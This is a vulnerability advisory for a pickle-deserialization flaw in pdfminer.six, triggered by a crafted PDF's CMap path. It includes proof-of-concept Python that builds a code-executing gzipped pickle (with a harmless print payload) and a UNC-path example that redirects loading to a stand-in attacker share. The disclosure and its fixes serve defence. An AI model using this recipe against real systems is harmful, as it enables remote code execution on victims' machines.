Description
Arbitrary Code Execution in pdfminer.six via Crafted PDF Input
Summary
pdfminer.six will execute arbitrary code from a malicious pickle file if provided with a malicious PDF file. The CMapDB._load_data() function in pdfminer.six uses pickle.loads() to deserialize pickle files. These pickle files are supposed to be part of the pdfminer.six distribution stored in the cmap/ directory, but a malicious PDF can specify an alternative directory and filename as long as the filename ends in .pickle.gz. A malicious, zipped pickle file can then contain code which will automatically execute when the PDF is processed.
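The following minimal sketch shows how a name taken from the PDF can escape the cmap/ directory. It assumes, as the description above implies, that the loader appends .pickle.gz to the CMap name and joins the result onto a directory with os.path.join. The sketch uses posixpath so it behaves the same on every platform. PACKAGE_CMAP_DIR, resolve_cmap_path and is_inside are hypothetical names for illustration, not pdfminer.six APIs, and the guard is not claimed to be the upstream fix.

```python
import posixpath

# Hypothetical location of the CMap pickles bundled with the package.
PACKAGE_CMAP_DIR = "/usr/lib/python3/site-packages/pdfminer/cmap"


def resolve_cmap_path(name: str, directory: str = PACKAGE_CMAP_DIR) -> str:
    """Turn a CMap name read from a PDF into a pickle path (simplified sketch)."""
    filename = "%s.pickle.gz" % name  # the extension is always appended
    # posixpath.join() discards `directory` entirely when `filename` is absolute.
    return posixpath.join(directory, filename)


def is_inside(directory: str, path: str) -> bool:
    """Hypothetical guard: accept only paths that stay inside `directory`.

    Lexical check only; it does not follow symlinks.
    """
    directory = posixpath.normpath(directory)
    path = posixpath.normpath(path)
    return posixpath.commonpath([directory, path]) == directory


print(resolve_cmap_path("UniGB-UCS2-H"))
# /usr/lib/python3/site-packages/pdfminer/cmap/UniGB-UCS2-H.pickle.gz
print(resolve_cmap_path("/pdfs/malicious"))
# /pdfs/malicious.pickle.gz
```

posixpath.join() restarts from any absolute component. As a result, an absolute CMap name replaces the intended directory outright, and a relative name containing .. can climb out of it. A production check would likely also resolve symlinks, for example with os.path.realpath, before comparing paths.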
Details
An attacker can:
- Create a malicious PDF with a CMap reference like /malicious
- Place a malicious pickle file at /malicious.pickle.gz
When the PDF is processed, pdfminer loads and deserializes the malicious pickle, and that deserialization can execute arbitrary Python code.
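Deserialization can run code because pickle lets an object specify, through __reduce__, a callable and its arguments. pickle.loads() then invokes that callable to rebuild the object. The sketch below uses print as a benign stand-in for an attacker's callable, and Payload is a hypothetical class name. The class is deleted before loading: the pickle stream only references builtins.print, so the loading side needs none of the attacker's code.

```python
import io
import pickle
from contextlib import redirect_stdout


class Payload:
    """Benign stand-in for an attacker's object."""

    def __reduce__(self):
        # Tell pickle to "rebuild" this object by calling builtins.print(...).
        return (print, ("Malicious code executed.",))


data = pickle.dumps(Payload())
del Payload  # the loading side needs no knowledge of the attacker's class

captured = io.StringIO()
with redirect_stdout(captured):
    result = pickle.loads(data)  # print() is called here, during deserialization

print(repr(captured.getvalue()))  # 'Malicious code executed.\n'
print(result)                     # None (the return value of print)
```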
POC
Malicious PDF
Create a PDF with a malicious CMap entry. Its /Encoding entry points to /pdfs/malicious, and pdfminer appends the extension .pickle.gz to this name. Save the PDF as /pdfs/malicious.pdf.
Malicious Pickle
Create a malicious, zipped pickle to execute, for example with a short Python script. The script used for this PoC creates a harmless, zipped pickle file that displays "Malicious code executed." and then exits when deserialized. Put the file in /pdfs/malicious.pickle.gz.
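The original script is not reproduced here. What follows is a minimal sketch of a comparable, harmless generator. Unlike the PoC's version, it only prints the message and does not exit. write_pickle_gz and load_like_cmapdb are hypothetical helper names. load_like_cmapdb only assumes, following the Summary, that the loader decompresses the file and passes its bytes to pickle.loads().

```python
import gzip
import pickle


class Payload:
    """Harmless payload: unpickling it only prints a message."""

    def __reduce__(self):
        # The PoC's payload also exited the process; this sketch only prints.
        return (print, ("Malicious code executed.",))


def write_pickle_gz(path: str) -> None:
    """Write a gzip-compressed pickle of Payload to `path`."""
    with gzip.open(path, "wb") as f:
        pickle.dump(Payload(), f)


def load_like_cmapdb(path: str):
    """Hypothetical loader: decompress, then unpickle (triggers the print)."""
    with gzip.open(path) as f:
        return pickle.loads(f.read())
```

To match the PoC layout, call write_pickle_gz("/pdfs/malicious.pickle.gz").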
Test
Install pdfminer.six and run pdf2txt.py /pdfs/malicious.pdf. Instead of the PDF being processed normally, you should see the output "Malicious code executed."
Impact
If pdfminer.six processes a malicious PDF that points to a zipped pickle file under an attacker's control, the result is arbitrary code execution on the victim's system. An attacker could execute Python code of their choosing with the permissions of the process running pdfminer.six.
The difficulty of exploitation depends on the operating system; see below.
Linux, macOS - harder to exploit
On Linux-like systems, only files on the local filesystem can be resolved. An attacker would need to supply the malicious PDF for processing, and the malicious pickle file would need to be present on the target system at a location the attacker already knows, since the full path must be embedded in the PDF itself. Even if the attacker provides the PDF and the pickle file together, there may be no way to know in advance which full path to specify, which in many cases makes exploitation difficult or impossible. However:
- An attacker may find a way to write files to a known location on the target system or
- The system in question may, by design, read files from a known location such as a network share designated for PDF ingestion.
Overall, there is generally less risk on a Linux or Linux-like system.
Windows - easier to exploit
Windows paths can specify network locations, e.g. via WebDAV or SMB. This means an attacker could host the malicious pickle remotely and specify a path to it in the PDF. Since there is no need to get the malicious pickle file onto the target system, exploitation is easier on Windows.
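Python's ntpath module applies Windows path rules on any platform. It can therefore illustrate why a UNC path used as the CMap name would redirect the lookup to a remote share. This is a minimal sketch that assumes the loader joins the CMap name onto its directory with os.path.join, which is ntpath.join on Windows. The install directory, the host attacker.example, and resolve_cmap_path_windows are all hypothetical. Whether Windows then fetches the file over SMB or WebDAV is operating-system behavior that this sketch does not exercise.

```python
import ntpath

# Hypothetical install location of the bundled CMap pickles on Windows.
PACKAGE_CMAP_DIR = r"C:\Python312\Lib\site-packages\pdfminer\cmap"


def resolve_cmap_path_windows(name: str) -> str:
    """Join a CMap name onto the package directory using Windows path rules."""
    # A UNC name (\\server\share\...) carries its own drive and root,
    # so ntpath.join() drops PACKAGE_CMAP_DIR completely.
    return ntpath.join(PACKAGE_CMAP_DIR, name + ".pickle.gz")


print(resolve_cmap_path_windows("UniGB-UCS2-H"))
# C:\Python312\Lib\site-packages\pdfminer\cmap\UniGB-UCS2-H.pickle.gz
print(resolve_cmap_path_windows(r"\\attacker.example\share\malicious"))
# \\attacker.example\share\malicious.pickle.gz
```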
Appendix
A complete, malicious PDF is provided here. A dockerized POC is available upon request.
References
- https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-wf5f-4jwr-ppcp
- https://nvd.nist.gov/vuln/detail/CVE-2025-64512
- https://github.com/pdfminer/pdfminer.six/commit/b808ee05dd7f0c8ea8ec34bdf394d40e63501086
- https://github.com/pdfminer/pdfminer.six/releases/tag/20251107
- https://lists.debian.org/debian-lts-announce/2025/11/msg00017.html
- https://lists.debian.org/debian-lts-announce/2026/01/msg00005.html
Packages
pdfminer.six: affected versions < 20251107; fixed in 20251107
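Given this affected range, you can check an environment by comparing the installed version against 20251107. This is a minimal sketch that assumes pdfminer.six keeps date-style version strings beginning with YYYYMMDD. is_affected and installed_is_affected are hypothetical helpers. importlib.metadata.version is the standard-library call used to read the installed version.

```python
import re
from importlib.metadata import PackageNotFoundError, version
from typing import Optional

FIXED_RELEASE = 20251107  # first fixed release listed above


def is_affected(ver: str) -> bool:
    """Return True if a pdfminer.six version string predates the fix.

    Assumes date-based versions whose first eight digits are YYYYMMDD.
    """
    match = re.match(r"\d{8}", ver)
    if match is None:
        raise ValueError(f"unrecognized pdfminer.six version: {ver!r}")
    return int(match.group()) < FIXED_RELEASE


def installed_is_affected() -> Optional[bool]:
    """Check the installed distribution; None if pdfminer.six is not installed."""
    try:
        return is_affected(version("pdfminer.six"))
    except PackageNotFoundError:
        return None


print(installed_is_affected())
```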
Related vulnerabilities
Pdfminer.six is a community-maintained fork of the original PDFMiner, a tool for extracting information from PDF documents. Prior to version 20251107, pdfminer.six will execute arbitrary code from a malicious pickle file if provided with a malicious PDF file. The `CMapDB._load_data()` function in pdfminer.six uses `pickle.loads()` to deserialize pickle files. These pickle files are supposed to be part of the pdfminer.six distribution stored in the `cmap/` directory, but a malicious PDF can specify an alternative directory and filename as long as the filename ends in `.pickle.gz`. A malicious, zipped pickle file can then contain code which will automatically execute when the PDF is processed. Version 20251107 fixes the issue.